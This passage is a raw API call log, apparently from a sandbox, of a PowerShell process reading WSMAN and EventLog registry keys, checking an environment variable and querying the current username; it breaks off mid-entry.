CoTaskMemFree (pv=0x2af370) [0110.368] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0110.368] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0110.368] CoTaskMemFree (pv=0x2af370) [0110.373] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0110.373] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0110.373] CoTaskMemFree (pv=0x2af370) [0110.520] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0110.520] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0110.521] CoTaskMemFree (pv=0x2af370) [0110.619] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0110.619] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0110.619] CoTaskMemFree (pv=0x2af370) [0110.619] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0110.619] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0110.619] CoTaskMemFree (pv=0x2af370) [0110.665] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d2f8 | out: phkResult=0x10d2f8*=0x340) returned 0x0 [0110.671] RegQueryInfoKeyW (in: hKey=0x340, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10d1fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d1f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10d1fc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d1f8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.671] CoTaskMemFree (pv=0x0) [0110.719] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0110.719] RegEnumValueW (in: hKey=0x340, dwIndex=0x0, lpValueName=0x23c0a0, lpcchValueName=0x10d2a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x10d2a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0110.719] CoTaskMemFree (pv=0x23c0a0) [0110.719] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0110.719] RegEnumValueW (in: hKey=0x340, dwIndex=0x1, lpValueName=0x23c0a0, lpcchValueName=0x10d2a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x10d2a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0110.719] CoTaskMemFree (pv=0x23c0a0) [0110.719] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0110.719] RegEnumValueW (in: hKey=0x340, dwIndex=0x2, lpValueName=0x23c0a0, lpcchValueName=0x10d2a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x10d2a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0110.719] CoTaskMemFree (pv=0x23c0a0) [0110.721] RegQueryValueExW (in: hKey=0x340, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10d28c, lpData=0x0, lpcbData=0x10d288*=0x0 | out: lpType=0x10d28c*=0x1, lpData=0x0, lpcbData=0x10d288*=0x8) returned 0x0 [0110.721] CoTaskMemAlloc (cb=0xc) returned 0x1b9aaa30 [0110.721] RegQueryValueExW (in: hKey=0x340, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10d25c, lpData=0x1b9aaa30, lpcbData=0x10d258*=0x8 | out: lpType=0x10d25c*=0x1, lpData="2.0", lpcbData=0x10d258*=0x8) returned 0x0 [0110.721] CoTaskMemFree (pv=0x1b9aaa30) [0110.807] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d248 | out: phkResult=0x10d248*=0x310) returned 0x0 [0110.807] RegQueryInfoKeyW (in: hKey=0x310, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10d14c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d148, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10d14c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d148*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0110.807] CoTaskMemFree (pv=0x0) [0110.807] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0110.807] RegEnumValueW (in: hKey=0x310, dwIndex=0x0, lpValueName=0x23c0a0, lpcchValueName=0x10d1f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x10d1f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0110.807] CoTaskMemFree (pv=0x23c0a0) [0110.807] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0110.807] RegEnumValueW (in: hKey=0x310, dwIndex=0x1, lpValueName=0x23c0a0, lpcchValueName=0x10d1f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x10d1f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0110.807] CoTaskMemFree (pv=0x23c0a0) [0110.807] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0110.808] RegEnumValueW (in: hKey=0x310, dwIndex=0x2, lpValueName=0x23c0a0, lpcchValueName=0x10d1f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x10d1f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0110.808] CoTaskMemFree (pv=0x23c0a0) [0110.808] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10d1dc, lpData=0x0, lpcbData=0x10d1d8*=0x0 | out: lpType=0x10d1dc*=0x1, lpData=0x0, lpcbData=0x10d1d8*=0x8) returned 0x0 [0110.808] CoTaskMemAlloc (cb=0xc) returned 0x1b9aa890 [0110.808] RegQueryValueExW (in: hKey=0x310, lpValueName="StackVersion", lpReserved=0x0, lpType=0x10d1ac, lpData=0x1b9aa890, lpcbData=0x10d1a8*=0x8 | out: lpType=0x10d1ac*=0x1, lpData="2.0", lpcbData=0x10d1a8*=0x8) returned 0x0 [0110.808] CoTaskMemFree (pv=0x1b9aa890) [0110.809] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0110.810] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0110.810] CoTaskMemFree (pv=0x2af370) [0114.270] CoTaskMemAlloc (cb=0x104) returned 0x2af370 [0114.270] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2af370, nSize=0x80 | out: lpBuffer="") returned 0x0 [0114.270] CoTaskMemFree (pv=0x2af370) [0124.142] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d278 | out: phkResult=0x10d278*=0x340) returned 0x0 [0124.149] RegQueryInfoKeyW (in: hKey=0x340, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10d1ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d1e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10d1ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d1e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.150] CoTaskMemFree (pv=0x0) [0124.152] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.152] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x0, lpName=0x23c0a0, lpcchName=0x10d278, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10d278, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.152] CoTaskMemFree (pv=0x23c0a0) [0124.152] CoTaskMemFree (pv=0x0) [0124.152] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.152] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x1, lpName=0x23c0a0, lpcchName=0x10d278, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10d278, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.152] CoTaskMemFree (pv=0x23c0a0) [0124.152] CoTaskMemFree (pv=0x0) [0124.152] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.152] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x2, lpName=0x23c0a0, lpcchName=0x10d278, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10d278, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.152] CoTaskMemFree (pv=0x23c0a0) [0124.153] CoTaskMemFree (pv=0x0) [0124.153] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.153] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x3, lpName=0x23c0a0, lpcchName=0x10d278, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10d278, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.153] CoTaskMemFree (pv=0x23c0a0) [0124.153] CoTaskMemFree (pv=0x0) [0124.153] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.153] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x4, lpName=0x23c0a0, lpcchName=0x10d278, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10d278, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.153] CoTaskMemFree (pv=0x23c0a0) [0124.153] CoTaskMemFree (pv=0x0) [0124.153] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.153] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x5, lpName=0x23c0a0, lpcchName=0x10d278, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10d278, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.153] CoTaskMemFree (pv=0x23c0a0) [0124.153] CoTaskMemFree (pv=0x0) [0124.153] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.153] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x6, lpName=0x23c0a0, lpcchName=0x10d278, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10d278, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.153] CoTaskMemFree (pv=0x23c0a0) [0124.153] CoTaskMemFree (pv=0x0) [0124.153] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.153] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x7, lpName=0x23c0a0, lpcchName=0x10d278, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10d278, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.153] CoTaskMemFree (pv=0x23c0a0) [0124.153] CoTaskMemFree (pv=0x0) [0124.153] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.154] RegEnumKeyExW (in: hKey=0x340, dwIndex=0x8, lpName=0x23c0a0, lpcchName=0x10d278, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10d278, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.154] CoTaskMemFree (pv=0x23c0a0) [0124.154] CoTaskMemFree (pv=0x0) [0124.154] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d2d8 | out: phkResult=0x10d2d8*=0x310) returned 0x0 [0124.154] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d2d8 | out: phkResult=0x10d2d8*=0x0) returned 0x2 [0124.154] RegOpenKeyExW (in: hKey=0x340, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d2d8 | out: phkResult=0x10d2d8*=0x314) returned 0x0 [0124.154] RegOpenKeyExW (in: hKey=0x314, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d2d8 | out: phkResult=0x10d2d8*=0x0) returned 0x2 [0124.154] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d2d8 | out: phkResult=0x10d2d8*=0x318) returned 0x0 [0124.154] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d2d8 | out: phkResult=0x10d2d8*=0x0) returned 0x2 [0124.154] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d2d8 | out: phkResult=0x10d2d8*=0x32c) returned 0x0 [0124.155] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d2d8 | out: phkResult=0x10d2d8*=0x0) returned 0x2 [0124.155] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d2d8 | out: phkResult=0x10d2d8*=0x344) returned 0x0 [0124.155] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d2d8 | out: phkResult=0x10d2d8*=0x0) returned 0x2 [0124.155] RegOpenKeyExW (in: hKey=0x340, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d2d8 | out: phkResult=0x10d2d8*=0x348) returned 0x0 [0124.155] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d2d8 | out: phkResult=0x10d2d8*=0x0) returned 0x2 [0124.155] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d2d8 | out: phkResult=0x10d2d8*=0x34c) returned 0x0 [0124.155] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d2d8 | out: phkResult=0x10d2d8*=0x0) returned 0x2 [0124.156] RegOpenKeyExW (in: hKey=0x340, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d2d8 | out: phkResult=0x10d2d8*=0x350) returned 0x0 [0124.156] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d2d8 | out: phkResult=0x10d2d8*=0x0) returned 0x2 [0124.156] RegOpenKeyExW (in: hKey=0x340, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d2d8 | out: phkResult=0x10d2d8*=0x354) returned 0x0 [0124.156] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d2d8 | out: phkResult=0x10d2d8*=0x358) returned 0x0 [0124.156] RegCloseKey (hKey=0x358) returned 0x0 [0124.156] RegCloseKey (hKey=0x340) returned 0x0 [0124.314] RegCloseKey (hKey=0x354) returned 0x0 [0124.356] CoTaskMemAlloc (cb=0x804) returned 0x223e70 [0124.356] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x223e70, nSize=0x10d4e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x10d4e8) returned 0x1 [0124.497] CoTaskMemFree (pv=0x223e70) [0124.500] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.500] GetUserNameW (in: lpBuffer=0x23c0a0, pcbBuffer=0x10d528 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x10d528) returned 1 [0124.500] CoTaskMemFree (pv=0x23c0a0) [0124.634] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d228 | out: phkResult=0x10d228*=0x35c) returned 0x0 [0124.634] RegQueryInfoKeyW (in: hKey=0x35c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10d19c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d198, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10d19c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d198*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.634] CoTaskMemFree (pv=0x0) [0124.634] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.634] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x0, lpName=0x23c0a0, lpcchName=0x10d228, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10d228, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.634] CoTaskMemFree (pv=0x23c0a0) [0124.634] CoTaskMemFree (pv=0x0) [0124.634] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.634] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x1, lpName=0x23c0a0, lpcchName=0x10d228, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10d228, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.634] CoTaskMemFree (pv=0x23c0a0) [0124.634] CoTaskMemFree (pv=0x0) [0124.634] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.634] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x2, lpName=0x23c0a0, lpcchName=0x10d228, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x10d228, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.635] CoTaskMemFree (pv=0x23c0a0) [0124.635] CoTaskMemFree (pv=0x0) [0124.635] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.635] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x3, lpName=0x23c0a0, lpcchName=0x10d228, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x10d228, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.635] CoTaskMemFree (pv=0x23c0a0) [0124.635] CoTaskMemFree (pv=0x0) [0124.635] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.635] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x4, lpName=0x23c0a0, lpcchName=0x10d228, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x10d228, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.635] CoTaskMemFree (pv=0x23c0a0) [0124.635] CoTaskMemFree (pv=0x0) [0124.635] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.635] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x5, lpName=0x23c0a0, lpcchName=0x10d228, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x10d228, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.635] CoTaskMemFree (pv=0x23c0a0) [0124.635] CoTaskMemFree (pv=0x0) [0124.635] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.635] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x6, lpName=0x23c0a0, lpcchName=0x10d228, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x10d228, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.636] CoTaskMemFree (pv=0x23c0a0) [0124.636] CoTaskMemFree (pv=0x0) [0124.636] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.636] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x7, lpName=0x23c0a0, lpcchName=0x10d228, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x10d228, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.636] CoTaskMemFree (pv=0x23c0a0) [0124.636] CoTaskMemFree (pv=0x0) [0124.636] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.636] RegEnumKeyExW (in: hKey=0x35c, dwIndex=0x8, lpName=0x23c0a0, lpcchName=0x10d228, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x10d228, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.636] CoTaskMemFree (pv=0x23c0a0) [0124.636] CoTaskMemFree (pv=0x0) [0124.636] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x360) returned 0x0 [0124.636] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x0) returned 0x2 [0124.636] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x364) returned 0x0 [0124.636] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x0) returned 0x2 [0124.637] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x368) returned 0x0 [0124.637] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x0) returned 0x2 [0124.637] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x36c) returned 0x0 [0124.637] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x0) returned 0x2 [0124.637] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x370) returned 0x0 [0124.637] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x0) returned 0x2 [0124.637] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x374) returned 0x0 [0124.637] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x0) returned 0x2 [0124.638] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x378) returned 0x0 [0124.638] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x0) returned 0x2 [0124.638] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x37c) returned 0x0 [0124.638] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x0) returned 0x2 [0124.638] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x380) returned 0x0 [0124.638] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d288 | out: phkResult=0x10d288*=0x384) returned 0x0 [0124.638] RegCloseKey (hKey=0x384) returned 0x0 [0124.639] RegCloseKey (hKey=0x35c) returned 0x0 [0124.639] RegCloseKey (hKey=0x380) returned 0x0 [0124.642] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d228 | out: phkResult=0x10d228*=0x380) returned 0x0 [0124.642] RegQueryInfoKeyW (in: hKey=0x380, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x10d19c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d198, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x10d19c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x10d198*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.642] CoTaskMemFree (pv=0x0) [0124.642] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.642] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x0, lpName=0x23c0a0, lpcchName=0x10d228, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x10d228, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.642] CoTaskMemFree (pv=0x23c0a0) [0124.642] CoTaskMemFree (pv=0x0) [0124.642] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.642] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x1, lpName=0x23c0a0, lpcchName=0x10d228, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x10d228, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0124.643] CoTaskMemFree (pv=0x23c0a0) [0124.643] CoTaskMemFree (pv=0x0) [0124.643] CoTaskMemAlloc (cb=0x204) returned 0x23c0a0 [0124.643] RegEnumKeyExW (in: hKey=0x380, dwIndex=0x2, lpName=0x23c0a0, lpcchName=0x10d228, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: 